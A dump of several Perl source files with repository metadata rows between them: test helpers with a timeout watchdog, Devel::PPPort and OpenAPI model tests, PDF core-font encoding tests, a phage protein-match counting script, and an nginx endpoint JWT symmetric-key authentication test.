# Use done_testing() instead of a fixed plan.
sub warnings_like {
my ($code, $expect, $name) = @_;
local $Level = $Level + 1;
my @w = capture_warnings($code);
cmp_ok(scalar @w, '==', scalar @$expect, $name);
foreach my $e (@$expect) {
if (ref $e) {
like(shift @w, $e, $name);
} else {
is(shift @w, $e, $name);
}
}
if (@w) {
diag("Saw these additional warnings:");
diag($_) foreach @w;
}
}
sub _fail_excess_warnings {
my($expect, $got, $name) = @_;
local $Level = $Level + 1;
# This will fail, and produce diagnostics
is($expect, scalar @$got, $name);
diag("Saw these warnings:");
diag($_) foreach @$got;
}
sub warning_is {
my ($code, $expect, $name) = @_;
die sprintf "Expect must be a string or undef, not a %s reference", ref $expect
if ref $expect;
local $Level = $Level + 1;
my @w = capture_warnings($code);
if (@w > 1) {
_fail_excess_warnings(0 + defined $expect, \@w, $name);
} else {
is($w[0], $expect, $name);
}
}
sub warning_like {
my ($code, $expect, $name) = @_;
die sprintf "Expect must be a regexp object"
unless ref $expect eq 'Regexp';
local $Level = $Level + 1;
my @w = capture_warnings($code);
if (@w > 1) {
_fail_excess_warnings(0 + defined $expect, \@w, $name);
} else {
like($w[0], $expect, $name);
}
}
# Set a watchdog to timeout the entire test file
# NOTE: If the test file uses 'threads', then call the watchdog() function
# _AFTER_ the 'threads' module is loaded.
sub watchdog ($;$)
{
my $timeout = shift;
my $method = shift || "";
my $timeout_msg = 'Test process timed out - terminating';
# Valgrind slows perl way down so give it more time before dying.
$timeout *= 10 if $ENV{PERL_VALGRIND};
my $pid_to_kill = $$; # PID for this process
if ($method eq "alarm") {
goto WATCHDOG_VIA_ALARM;
}
# shut up use only once warning
my $threads_on = $threads::threads && $threads::threads;
# Don't use a watchdog process if 'threads' is loaded -
# use a watchdog thread instead
if (!$threads_on || $method eq "process") {
# On Windows and VMS, try launching a watchdog process
# using system(1, ...) (see perlport.pod)
if ($is_mswin || $is_vms) {
# On Windows, try to get the 'real' PID
if ($is_mswin) {
eval { require Win32; };
if (defined(&Win32::GetCurrentProcessId)) {
$pid_to_kill = Win32::GetCurrentProcessId();
}
}
# If we still have a fake PID, we can't use this method at all
return if ($pid_to_kill <= 0);
# Launch watchdog process
my $watchdog;
eval {
local $SIG{'__WARN__'} = sub {
_diag("Watchdog warning: $_[0]");
};
my $sig = $is_vms ? 'TERM' : 'KILL';
my $prog = "sleep($timeout);" .
"warn qq/# $timeout_msg" . '\n/;' .
"kill(q/$sig/, $pid_to_kill);";
# On Windows use the indirect object plus LIST form to guarantee
# that perl is launched directly rather than via the shell (see
# perlfunc.pod), and ensure that the LIST has multiple elements
# since the indirect object plus COMMANDSTRING form seems to
# hang (see perl #121283). Don't do this on VMS, which doesn't
# support the LIST form at all.
if ($is_mswin) {
my $runperl = which_perl();
if ($runperl =~ m/\s/) {
$runperl = qq{"$runperl"};
}
$watchdog = system({ $runperl } 1, $runperl, '-e', $prog);
}
else {
my $cmd = _create_runperl(prog => $prog);
$watchdog = system(1, $cmd);
}
};
if ($@ || ($watchdog <= 0)) {
_diag('Failed to start watchdog');
_diag($@) if $@;
undef($watchdog);
return;
}
# Add END block to parent to terminate and
# clean up watchdog process
eval("END { local \$! = 0; local \$? = 0;
wait() if kill('KILL', $watchdog); };");
return;
}
# Try using fork() to generate a watchdog process
my $watchdog;
eval { $watchdog = fork() };
if (defined($watchdog)) {
if ($watchdog) { # Parent process
# Add END block to parent to terminate and
# clean up watchdog process
eval "END { local \$! = 0; local \$? = 0;
wait() if kill('KILL', $watchdog); };";
return;
}
### Watchdog process code
# Load POSIX if available
eval { require POSIX; };
# Execute the timeout
sleep($timeout - 2) if ($timeout > 2); # Workaround for perlbug #49073
sleep(2);
# Kill test process if still running
if (kill(0, $pid_to_kill)) {
_diag($timeout_msg);
kill('KILL', $pid_to_kill);
if ($is_cygwin) {
# sometimes the above isn't enough on cygwin
sleep 1; # wait a little, it might have worked after all
system("/bin/kill -f $pid_to_kill");
}
}
# Don't execute END block (added at beginning of this file)
$NO_ENDING = 1;
# Terminate ourself (i.e., the watchdog)
POSIX::_exit(1) if (defined(&POSIX::_exit));
exit(1);
}
# fork() failed - fall through and try using a thread
}
# Use a watchdog thread because either 'threads' is loaded,
# or fork() failed
if (eval {require threads; 1}) {
'threads'->create(sub {
# Load POSIX if available
eval { require POSIX; };
# Execute the timeout
my $time_left = $timeout;
do {
$time_left = $time_left - sleep($time_left);
} while ($time_left > 0);
# Kill the parent (and ourself)
select(STDERR); $| = 1;
_diag($timeout_msg);
POSIX::_exit(1) if (defined(&POSIX::_exit));
my $sig = $is_vms ? 'TERM' : 'KILL';
kill($sig, $pid_to_kill);
})->detach();
return;
}
# If everything above fails, then just use an alarm timeout
WATCHDOG_VIA_ALARM:
if (eval { alarm($timeout); 1; }) {
# Load POSIX if available
eval { require POSIX; };
# Alarm handler will do the actual 'killing'
$SIG{'ALRM'} = sub {
select(STDERR); $| = 1;
_diag($timeout_msg);
POSIX::_exit(1) if (defined(&POSIX::_exit));
my $sig = $is_vms ? 'TERM' : 'KILL';
kill($sig, $pid_to_kill);
};
}
}
1;
| 28.866938 | 107 | 0.543337 |
ed1cb2e3ac21ec316bea0543a2f8417e20dd7581 | 1,326 | t | Perl | perl/src/ext/Devel-PPPort/t/limits.t | nokibsarkar/sl4a | d3c17dca978cbeee545e12ea240a9dbf2a6999e9 | [
"Apache-2.0"
] | 2,293 | 2015-01-02T12:46:10.000Z | 2022-03-29T09:45:43.000Z | perl/src/ext/Devel-PPPort/t/limits.t | nokibsarkar/sl4a | d3c17dca978cbeee545e12ea240a9dbf2a6999e9 | [
"Apache-2.0"
] | 315 | 2015-05-31T11:55:46.000Z | 2022-01-12T08:36:37.000Z | perl/src/ext/Devel-PPPort/t/limits.t | nokibsarkar/sl4a | d3c17dca978cbeee545e12ea240a9dbf2a6999e9 | [
"Apache-2.0"
] | 1,033 | 2015-01-04T07:48:40.000Z | 2022-03-24T09:34:37.000Z | ################################################################################
#
# !!!!! Do NOT edit this file directly! !!!!!
#
# Edit mktests.PL and/or parts/inc/limits instead.
#
# This file was automatically generated from the definition files in the
# parts/inc/ subdirectory by mktests.PL. To learn more about how all this
# works, please read the F<HACKERS> file that came with this distribution.
#
################################################################################
BEGIN {
if ($ENV{'PERL_CORE'}) {
chdir 't' if -d 't';
@INC = ('../lib', '../ext/Devel-PPPort/t') if -d '../lib' && -d '../ext';
require Config; import Config;
use vars '%Config';
if (" $Config{'extensions'} " !~ m[ Devel/PPPort ]) {
print "1..0 # Skip -- Perl configured without Devel::PPPort module\n";
exit 0;
}
}
else {
unshift @INC, 't';
}
sub load {
eval "use Test";
require 'testutil.pl' if $@;
}
if (4) {
load();
plan(tests => 4);
}
}
use Devel::PPPort;
use strict;
$^W = 1;
package Devel::PPPort;
use vars '@ISA';
require DynaLoader;
@ISA = qw(DynaLoader);
bootstrap Devel::PPPort;
package main;
ok(&Devel::PPPort::iv_size());
ok(&Devel::PPPort::uv_size());
ok(&Devel::PPPort::iv_type());
ok(&Devel::PPPort::uv_type());
| 23.678571 | 80 | 0.5181 |
ed89dcb3c1c156dfdf3a3c34530831d6bc58cb67 | 800 | t | Perl | t/EzsigntemplateformfieldgroupsignerResponseTest.t | ezmaxinc/eZmax-SDK-perl | 3de20235136371b946247d2aed9e5e5704a4051c | [
"MIT"
] | null | null | null | t/EzsigntemplateformfieldgroupsignerResponseTest.t | ezmaxinc/eZmax-SDK-perl | 3de20235136371b946247d2aed9e5e5704a4051c | [
"MIT"
] | null | null | null | t/EzsigntemplateformfieldgroupsignerResponseTest.t | ezmaxinc/eZmax-SDK-perl | 3de20235136371b946247d2aed9e5e5704a4051c | [
"MIT"
] | null | null | null | =begin comment
eZmax API Definition (Full)
This API expose all the functionnalities for the eZmax and eZsign applications.
The version of the OpenAPI document: 1.1.7
Contact: support-api@ezmax.ca
Generated by: https://openapi-generator.tech
=end comment
=cut
#
# NOTE: This class is auto generated by the OpenAPI Generator
# Please update the test cases below to test the model.
# Ref: https://openapi-generator.tech
#
use Test::More tests => 2;
use Test::Exception;
use lib 'lib';
use strict;
use warnings;
use_ok('EzmaxApi::Object::EzsigntemplateformfieldgroupsignerResponse');
# uncomment below and update the test
#my $instance = EzmaxApi::Object::EzsigntemplateformfieldgroupsignerResponse->new();
#
#isa_ok($instance, 'EzmaxApi::Object::EzsigntemplateformfieldgroupsignerResponse');
| 22.857143 | 84 | 0.775 |
edb607c2859a07034594ac4849e18f780b81447f | 5,540 | t | Perl | t/core-font.t | p6-pdf/perl6-PDF-Graphics | c58e90bd070dd08b8ed9bc8bb3e067f1e9ee4167 | [
"Artistic-2.0"
] | 2 | 2018-04-02T20:52:14.000Z | 2018-08-27T17:51:18.000Z | t/core-font.t | p6-pdf/perl6-PDF-Graphics | c58e90bd070dd08b8ed9bc8bb3e067f1e9ee4167 | [
"Artistic-2.0"
] | 4 | 2017-12-23T21:03:28.000Z | 2020-03-12T23:24:00.000Z | t/core-font.t | p6-pdf/perl6-PDF-Graphics | c58e90bd070dd08b8ed9bc8bb3e067f1e9ee4167 | [
"Artistic-2.0"
] | 1 | 2019-07-16T00:29:03.000Z | 2019-07-16T00:29:03.000Z | use v6;
use Test;
plan 54;
use lib 't/lib';
use PDF::Grammar::Test :is-json-equiv;
use PDF::Content::Font;
use PDF::Content::Font::CoreFont;
use PDFTiny;
is PDF::Content::Font::CoreFont.core-font-name('Helvetica,Bold'), 'helvetica-bold', 'core-font-name';
is PDF::Content::Font::CoreFont.core-font-name('Helvetica-BoldOblique'), 'helvetica-boldoblique', 'core-font-name';
is PDF::Content::Font::CoreFont.core-font-name('Arial,Bold'), 'helvetica-bold', 'core-font-name';
is-deeply PDF::Content::Font::CoreFont.core-font-name('Blah'), Nil, 'core-font-name';
my PDF::Content::Font::CoreFont $tr-bold .= load-font( :family<Times-Roman>, :weight<bold>);
is $tr-bold.font-name, 'Times-Bold', 'font-name';
my PDF::Content::Font::CoreFont $tsym .= load-font( :family<Symbol>, :weight<bold>);
is $tsym.font-name, 'Symbol', 'font-name';
is $tsym.enc, 'sym', 'enc';
my PDF::Content::Font::CoreFont $hb-afm .= load-font( 'Helvetica-Bold' );
isa-ok $hb-afm.metrics, 'Font::AFM';
is $hb-afm.font-name, 'Helvetica-Bold', 'font-name';
is $hb-afm.enc, 'win', '.enc';
is $hb-afm.height, 1190, 'font height';
is $hb-afm.height(:hanging), 925, 'font height hanging';
is-approx $hb-afm.height(12), 14.28, 'font height @ 12pt';
is-approx $hb-afm.height(12, :from-baseline), 11.544, 'font base-height @ 12pt';
is-approx $hb-afm.height(12, :hanging), 11.1, 'font hanging height @ 12pt';
is $hb-afm.encode("A♥♣✔B"), "A\x[1]\x[2]B", '.encode(...) sanity';
# - 'A' & 'B' are in the encoding scheme and font
# - '♥', '♣' are in the font, but not the encoding scheme
# - '✔' is in neither
is-deeply $hb-afm.encoder.charset, (my UInt %{UInt} = 'A'.ord => 'A'.ord, 'B'.ord => 'B'.ord, '♥'.ord => 1, '♣'.ord => 2), 'charset';
is-json-equiv $hb-afm.encoder.differences, (1, "heart", "club"), 'differences';
my PDF::Content::Font::CoreFont $ab-afm .= load-font( 'Arial-Bold' );
isa-ok $ab-afm.metrics, 'Font::AFM';
is $ab-afm.font-name, 'Helvetica-Bold', 'font-name';
is $ab-afm.encode("A♥♣✔B"), "A\x[1]\x[2]B", '.encode(...) sanity';
my PDF::Content::Font::CoreFont $hbi-afm .= load-font( :family<Helvetica>, :weight<Bold>, :style<Italic> );
is $hbi-afm.font-name, 'Helvetica-BoldOblique', ':font-family => font-name';
my PDF::Content::Font::CoreFont $hb-afm-again .= load-font( 'Helvetica-Bold' );
ok $hb-afm-again === $hb-afm, 'font caching';
my $ext-chars = "ΨΩαΩ";
my $enc = $hbi-afm.encode($ext-chars);
is $enc, "\x[1]\x[2]\x[3]\x[2]", "extended chars encoding";
is $hbi-afm.decode($enc), $ext-chars, "extended chars decoding";
$hbi-afm.cb-finish;
my $hbi-afm-dict = $hbi-afm.to-dict;
is-json-equiv $hbi-afm-dict, {
:Type<Font>,
:Subtype<Type1>,
:BaseFont<Helvetica-BoldOblique>,
:Encoding{
:Type<Encoding>,
:BaseEncoding<WinAnsiEncoding>,
:Differences[1, "Psi", "Omega", "alpha"],
},
}, "to-dict (extended chars)";
my PDF::Content::Font::CoreFont $tr-afm .= load-font( 'Times-Roman' );
is $tr-afm.stringwidth("RVX", :!kern), 2111, 'stringwidth :!kern';
is $tr-afm.stringwidth("RVX", :kern), 2111 - 80, 'stringwidth :kern';
is-deeply $tr-afm.kern("RVX" ), (['R', -80, 'VX'], 2031), '.kern(...)';
for (win => "Á®ÆØ",
mac => "種¯") {
my ($enc, $encoded) = .kv;
my $fnt = PDF::Content::Font::CoreFont.load-font( 'helvetica', :$enc );
my $decoded = "Á®ÆØ";
my $re-encoded = $fnt.encode($decoded);
is-deeply $re-encoded, $encoded, "$enc encoding";
is-deeply $fnt.decode($encoded), $decoded, "$enc decoding";
is-deeply $fnt.decode($encoded, :ords), $decoded.ords, "$enc raw decoding";
}
my PDF::Content::Font::CoreFont $zapf .= load-font( 'ZapfDingbats' );
isa-ok $zapf.metrics, 'Font::Metrics::zapfdingbats';
is $zapf.enc, 'zapf', '.enc';
is $zapf.encode("♥♣✔"), "ª¨4", '.encode(...)'; # /a110 /a112 /a20
is $zapf.decode("ª¨4"), "♥♣✔", '.decode(...)';
is $zapf.decode("\o251\o252"), "♦♥", '.decode(...)';
isa-ok PDF::Content::Font::CoreFont.load-font('CourierNew,Bold').metrics, 'Font::Metrics::courier-bold';
my PDF::Content::Font::CoreFont $sym .= load-font( 'Symbol' );
isa-ok $sym.metrics, 'Font::Metrics::symbol';
is $sym.enc, 'sym', '.enc';
is $sym.encode("ΑΒΓ"), "ABG", '.encode(...)'; # /Alpha /Beta /Gamma
is $sym.decode("ABG"), "ΑΒΓ", '.decode(...)';
use Font::AFM;
use PDF::Content::Font::Enc::Type1;
my $metrics = Font::AFM.core-font('times-roman');
my @differences = [1, 'x', 'y', 10, 'a', 'b'];
my PDF::Content::Font::Enc::Type1 $encoder .= new: :enc<win>;
$encoder.differences = @differences;
my PDF::Content::Font::CoreFont $tr .= new: :$metrics, :$encoder;
is-deeply $tr.encode('abcxyz', :cids), buf8.new(10,11,99,1,2,122), 'win differences encoding';
$tr.cb-finish;
is-json-equiv $tr.to-dict<Encoding><Differences>, [1, "x", "y", 10, "a", "b"], 'dfferences to-dict';
$encoder .= new: :enc<mac-extra>;
$encoder.differences = @differences;
$tr .= new: :$metrics, :$encoder;
my $dec = 'abcxyz½';
$enc = buf8.new(10,11,3,1,2,4,72);
is-deeply $tr.encode($dec, :cids), $enc, 'mac-extra differences encoding';
is-deeply $tr.decode($enc.decode), $dec, 'mac-extra differences decoding';
$tr.cb-finish;
is-json-equiv $tr.to-dict<Encoding><Differences>, [1, "x", "y", "c", "z", 10, "a", "b"], 'dfferences to-dict';
my PDFTiny $pdf1 .= new;
my PDFTiny $pdf2 .= new;
my $tr1 = $pdf1.core-font('times-roman');
my $tr2 = $pdf2.core-font('times-roman');
is $tr1.font-name, 'Times-Roman';
ok $tr1 === $pdf1.core-font('times-roman'), 'PDF font caching';
ok $tr1 !=== $tr2, 'font uniqueness 1';
ok $tr1 !=== $pdf2.core-font('times-roman'), 'font uniqueness 2';
done-testing;
| 42.615385 | 133 | 0.63231 |
edb62c0945bc63656c16b6998fa664f6e6dcedf5 | 2,623 | pl | Perl | phage_tree/countproteinmatches.pl | linsalrob/bioinformatics | da250531fdc3b0e5d6be0ac44d7874fa201f92b0 | [
"MIT"
] | null | null | null | phage_tree/countproteinmatches.pl | linsalrob/bioinformatics | da250531fdc3b0e5d6be0ac44d7874fa201f92b0 | [
"MIT"
] | null | null | null | phage_tree/countproteinmatches.pl | linsalrob/bioinformatics | da250531fdc3b0e5d6be0ac44d7874fa201f92b0 | [
"MIT"
] | 1 | 2020-03-07T07:15:51.000Z | 2020-03-07T07:15:51.000Z | #!/usr/bin/perl -w
# Copyright 2001, 20002 Rob Edwards
# For updates, more information, or to discuss the scripts
# please contact Rob Edwards at redwards@utmem.edu or via http://www.salmonella.org/
#
# This file is part of The Phage Proteome Scripts developed by Rob Edwards.
#
# Tnese scripts are free software; you can redistribute and/or modify
# them under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# They are distributed in the hope that they will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# in the file (COPYING) along with these scripts; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
#
use DBI;
use strict;
my $dbh=DBI->connect("DBI:mysql:phage", "SQLUSER", "SQLPASSWORD") or die "Can't connect to database\n";
my $dir= shift || &niceexit("countproteinmatches.pl <dir of prot dists>\n");
my @count; my %max;
# read each file one at a time, and add the data to an array
opendir(DIR, $dir) || &niceexit("Can't open $dir");
while (my $file = readdir(DIR)) {
next if ($file =~ /^\./);
open (IN, "$dir/$file") || &niceexit("Can't open $dir/$file\n");
my $get;
while (my $line = <IN>) {
if ($line =~ /Sequences producing/) {$get = 1; next}
next unless ($get);
last if ($line =~ /^>/);
next unless ($line =~ /\d_\d/);
my @a = split (/\s+/, $line);
my ($gene, $source) =split (/_/, $a[0]);
unless ($gene && $source) {die "problem parsing $line\n"}
$count[$source][$gene]++;
unless ($max{$source}) {$max{$source}=$count[$source][$gene]}
if ($count[$source][$gene] > $max{$source}) {$max{$source}=$count[$source][$gene]}
}
close IN;
}
closedir(DIR);
foreach my $source (0 .. $#count) {
foreach my $gene (0 .. $#{$count[$source]}) {
if ($count[$source][$gene]) {
if ($count[$source][$gene] > 1) {print "$source\t$gene\t",$count[$source][$gene] - 1,"\n"}}
}
}
&niceexit();
#my $exc = $dbh->prepare("SELECT translation from protein where count = $gene" ) or croak $dbh->errstr;
# $exc->execute or die $dbh->errstr;
# while (my @retrieved = $exc->fetchrow_array) {print OUT ">$a[0]\n$retrieved[0]\n"}
sub niceexit {
my $reason = shift;
$dbh->disconnect;
if ($reason) {print STDERR $reason; exit(-1)}
else {exit(0)}
}
| 33.628205 | 103 | 0.646588 |
ed0a8a4f870acb476ae0edd5f915b62177a4c25f | 11,738 | t | Perl | src/nginx/t/auth_symmetrickey.t | TAOXUY/esp | ca70265e9ef6a560eed3bf0ff1cf7cc24c004a16 | [
"BSD-2-Clause"
] | 275 | 2017-07-12T17:05:22.000Z | 2022-03-27T14:25:21.000Z | src/nginx/t/auth_symmetrickey.t | TAOXUY/esp | ca70265e9ef6a560eed3bf0ff1cf7cc24c004a16 | [
"BSD-2-Clause"
] | 322 | 2017-06-07T21:56:10.000Z | 2022-03-26T14:46:34.000Z | src/nginx/t/auth_symmetrickey.t | TAOXUY/esp | ca70265e9ef6a560eed3bf0ff1cf7cc24c004a16 | [
"BSD-2-Clause"
] | 125 | 2017-06-07T20:51:25.000Z | 2022-03-12T15:30:12.000Z | # Copyright (C) Extensible Service Proxy Authors
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
################################################################################
#
use strict;
use warnings;
################################################################################
use src::nginx::t::ApiManager; # Must be first (sets up import path to the Nginx test module)
use src::nginx::t::HttpServer;
use src::nginx::t::Auth;
use Test::Nginx; # Imports Nginx's test module
use Test::More; # And the test framework
################################################################################
# Port assignments
my $NginxPort = ApiManager::pick_port();
my $BackendPort = ApiManager::pick_port();
my $ServiceControlPort = ApiManager::pick_port();
my $PubkeyPort = ApiManager::pick_port();
my $t = Test::Nginx->new()->has(qw/http proxy/)->plan(48);
my $config = ApiManager::get_bookstore_service_config;
$config .= <<"EOF";
authentication {
providers {
id: "test_auth"
issuer: "test-esp-auth.com"
jwks_uri: "http://127.0.0.1:${PubkeyPort}/key"
}
rules {
selector: "ListShelves"
requirements {
provider_id: "test_auth"
audiences: "ok_audience_1,ok_audience_2"
}
}
}
control {
environment: "http://127.0.0.1:${ServiceControlPort}"
}
EOF
$t->write_file('service.pb.txt', $config);
ApiManager::write_file_expand($t, 'nginx.conf', <<"EOF");
%%TEST_GLOBALS%%
daemon off;
events {
worker_connections 32;
}
http {
%%TEST_GLOBALS_HTTP%%
server_tokens off;
server {
listen 127.0.0.1:${NginxPort};
server_name localhost;
location / {
endpoints {
api service.pb.txt;
%%TEST_CONFIG%%
on;
}
proxy_pass http://127.0.0.1:${BackendPort};
}
}
}
EOF
# From matching-client-secret-symmetric.json
my $key = "abcedfgabcdefg";
$t->run_daemon(\&bookstore, $t, $BackendPort, 'bookstore.log');
$t->run_daemon(\&servicecontrol, $t, $ServiceControlPort, 'servicecontrol.log');
$t->run_daemon(\&key, $t, $PubkeyPort, $key, 'key.log');
is($t->waitforsocket("127.0.0.1:${BackendPort}"), 1, 'Bookstore socket ready.');
is($t->waitforsocket("127.0.0.1:${ServiceControlPort}"), 1, 'Service control socket ready.');
is($t->waitforsocket("127.0.0.1:${PubkeyPort}"), 1, 'Pubkey socket ready.');
$t->run();
################################################################################
# Missing credentials.
my $response = ApiManager::http_get($NginxPort,'/shelves');
like($response, qr/HTTP\/1\.1 401 Unauthorized/, 'Returned HTTP 401, missing creds.');
like($response, qr/WWW-Authenticate: Bearer/, 'Returned auth challenge.');
like($response, qr/Content-Type: application\/json/i,
'Missing creds returned application/json body.');
like($response, qr/JWT validation failed: Missing or invalid credentials/i,
"Error body contains 'Missing or invalid credentials'.");
# Invalid credentials.
$response = ApiManager::http($NginxPort,<<'EOF');
GET /shelves HTTP/1.0
Host: localhost
Authorization: Bearer invalid.token
EOF
like($response, qr/HTTP\/1\.1 401 Unauthorized/, 'Returned HTTP 401, invalid token.');
like($response, qr/WWW-Authenticate: Bearer, error=\"invalid_token\"/, 'Returned invalid_token challenge.');
like($response, qr/Content-Type: application\/json/i,
'Invalid token returned application/json body.');
like($response, qr/JWT validation failed: Bad JWT format: Invalid JSON in header/i,
"Error body contains 'bad format'.");
# Token generated from different issuer/key.
my $token = Auth::get_auth_token('./src/nginx/t/wrong-client-secret-symmetric.json');
$response = ApiManager::http($NginxPort,<<"EOF");
GET /shelves HTTP/1.0
Host: localhost
Authorization: Bearer $token
EOF
like($response, qr/HTTP\/1\.1 401 Unauthorized/, 'Returned HTTP 401, no matching client secret.');
like($response, qr/WWW-Authenticate: Bearer, error=\"invalid_token\"/, 'Returned invalid_token challenge.');
like($response, qr/Content-Type: application\/json/i,
'No matching client secret returned application/json body.');
# Audience not allowed.
$token = Auth::get_auth_token('./src/nginx/t/matching-client-secret-symmetric.json', 'bad_audience');
$response = ApiManager::http($NginxPort,<<"EOF");
GET /shelves HTTP/1.0
Host: localhost
Authorization: Bearer $token
EOF
like($response, qr/HTTP\/1\.1 403 Forbidden/, 'Returned HTTP 403, audience not allowed.');
like($response, qr/WWW-Authenticate: Bearer, error=\"invalid_token\"/, 'Returned invalid_token challenge.');
like($response, qr/Content-Type: application\/json/i,
'Audience not allowed returned application/json body.');
$t->stop_daemons();
my $no_bookstore_requests = $t->read_file('bookstore.log');
is($no_bookstore_requests, '', 'Request did not reach the backend.');
my $no_key_requests = $t->read_file('key.log');
is($no_key_requests, '', 'No client secret fetch (bad token).');
# Key is unreachable.
$token = Auth::get_auth_token('./src/nginx/t/matching-client-secret-symmetric.json', 'ok_audience_1');
$response = ApiManager::http($NginxPort,<<"EOF");
GET /shelves?key=this-is-an-api-key HTTP/1.0
Host: localhost
Authorization: Bearer $token
EOF
like($response, qr/HTTP\/1\.1 401 Unauthorized/, 'Returned HTTP 401, unable to fetch key.');
like($response, qr/WWW-Authenticate: Bearer, error=\"invalid_token\"/, 'Returned invalid_token challenge.');
like($response, qr/Content-Type: application\/json/i,
'Unable to fetch key returned application/json body.');
# Auth OK with allowed audience, key is not cached, token in url parameter.
$t->run_daemon(\&bookstore, $t, $BackendPort, 'bookstore.log');
$t->run_daemon(\&servicecontrol, $t, $ServiceControlPort, 'servicecontrol.log');
$t->run_daemon(\&key, $t, $PubkeyPort, $key, 'key.log');
is($t->waitforsocket("127.0.0.1:${BackendPort}"), 1, 'Bookstore socket ready.');
is($t->waitforsocket("127.0.0.1:${ServiceControlPort}"), 1, 'Service control port ready.');
is($t->waitforsocket("127.0.0.1:${PubkeyPort}"), 1, 'Pubkey socket ready.');
$token = Auth::get_auth_token('./src/nginx/t/matching-client-secret-symmetric.json', 'ok_audience_1');
# OK requests need to use different api-keys to avoid service_control cache.
$response = ApiManager::http($NginxPort,<<"EOF");
GET /shelves?key=this-is-an-api-key1&access_token=$token HTTP/1.0
Host: localhost
EOF
my ($response_headers, $response_body) = split /\r\n\r\n/, $response, 2;
like($response_headers, qr/HTTP\/1\.1 200 OK/, 'Returned HTTP 200.');
unlike($response_headers, qr/WWW-Authenticate/, 'Returned auth challenge.');
is($response_body, <<'EOF', 'Shelves returned in the response body.');
{ "shelves": [
{ "name": "shelves/1", "theme": "Fiction" },
{ "name": "shelves/2", "theme": "Fantasy" }
]
}
EOF
$t->stop_daemons();
my @bookstore_requests = ApiManager::read_http_stream($t, 'bookstore.log');
is(scalar @bookstore_requests, 1, 'Backend received one request');
my $r = shift @bookstore_requests;
is($r->{verb}, 'GET', 'Backend request was a get');
like($r->{uri}, qr/\/shelves\?key=this-is-an-api-key1&access_token=\S+/, 'Backend request was get /shelves');
is($r->{headers}->{host}, "127.0.0.1:${BackendPort}", 'Host header was set.');
my @key_requests = ApiManager::read_http_stream($t, 'key.log');
is(scalar @key_requests, 1, 'There was one key request');
$r = shift @key_requests;
is($r->{verb}, 'GET', 'Key request was a get');
is($r->{uri}, '/key', 'Key uri was /key');
is($r->{headers}->{host}, "127.0.0.1:${PubkeyPort}", 'Host header was set');
# Auth OK with audience = service_name.
$t->run_daemon(\&bookstore, $t, $BackendPort, 'bookstore.log');
$t->run_daemon(\&servicecontrol, $t, $ServiceControlPort, 'servicecontrol.log');
$t->run_daemon(\&key, $t, $PubkeyPort, $key, 'key.log');
is($t->waitforsocket("127.0.0.1:${BackendPort}"), 1, 'Bookstore socket ready.');
is($t->waitforsocket("127.0.0.1:${ServiceControlPort}"), 1, 'Service control port ready.');
is($t->waitforsocket("127.0.0.1:${PubkeyPort}"), 1, 'Pubkey socket ready.');
$token = Auth::get_auth_token('./src/nginx/t/matching-client-secret-symmetric.json');
# OK requests need to use different api-keys to avoid service_control cache.
$response = ApiManager::http($NginxPort,<<"EOF");
GET /shelves?key=this-is-an-api-key2 HTTP/1.0
Host: localhost
Authorization: Bearer $token
EOF
($response_headers, $response_body) = split /\r\n\r\n/, $response, 2;
like($response_headers, qr/HTTP\/1\.1 200 OK/, 'Returned HTTP 200.');
unlike($response_headers, qr/WWW-Authenticate/, 'Returned auth challenge.');
is($response_body, <<'EOF', 'Shelves returned in the response body.');
{ "shelves": [
{ "name": "shelves/1", "theme": "Fiction" },
{ "name": "shelves/2", "theme": "Fantasy" }
]
}
EOF
$t->stop_daemons();
my @bookstore_requests = ApiManager::read_http_stream($t, 'bookstore.log');
is(scalar @bookstore_requests, 1, 'Backend received one request');
my $r = shift @bookstore_requests;
is($r->{verb}, 'GET', 'Backend request was a get');
like($r->{uri}, qr/\/shelves\?key=this-is-an-api-key2$/, 'Backend request was get /shelves');
is($r->{headers}->{host}, "127.0.0.1:${BackendPort}", 'Host header was set.');
like($r->{headers}->{authorization}, qr/Bearer \S+/, 'Backend was was authenticated.');
$no_key_requests = $t->read_file('key.log');
is($no_key_requests, '', 'No key fetch (cached).');
$t->stop();
################################################################################
sub bookstore {
my ($t, $port, $file) = @_;
my $server = HttpServer->new($port, $t->testdir() . '/' . $file)
or die "Can't create test server socket: $!\n";
local $SIG{PIPE} = 'IGNORE';
$server->on('GET', '/shelves', <<'EOF');
HTTP/1.1 200 OK
Connection: close
{ "shelves": [
{ "name": "shelves/1", "theme": "Fiction" },
{ "name": "shelves/2", "theme": "Fantasy" }
]
}
EOF
$server->run();
}
sub servicecontrol {
my ($t, $port, $file) = @_;
my $server = HttpServer->new($port, $t->testdir() . '/' . $file)
or die "Can't create test server socket: $!\n";
local $SIG{PIPE} = 'IGNORE';
$server->on('POST', '/v1/services/endpoints-test.cloudendpointsapis.com:check', <<'EOF');
HTTP/1.1 200 OK
Connection: close
EOF
$server->run();
}
sub key {
my ($t, $port, $secret, $file) = @_;
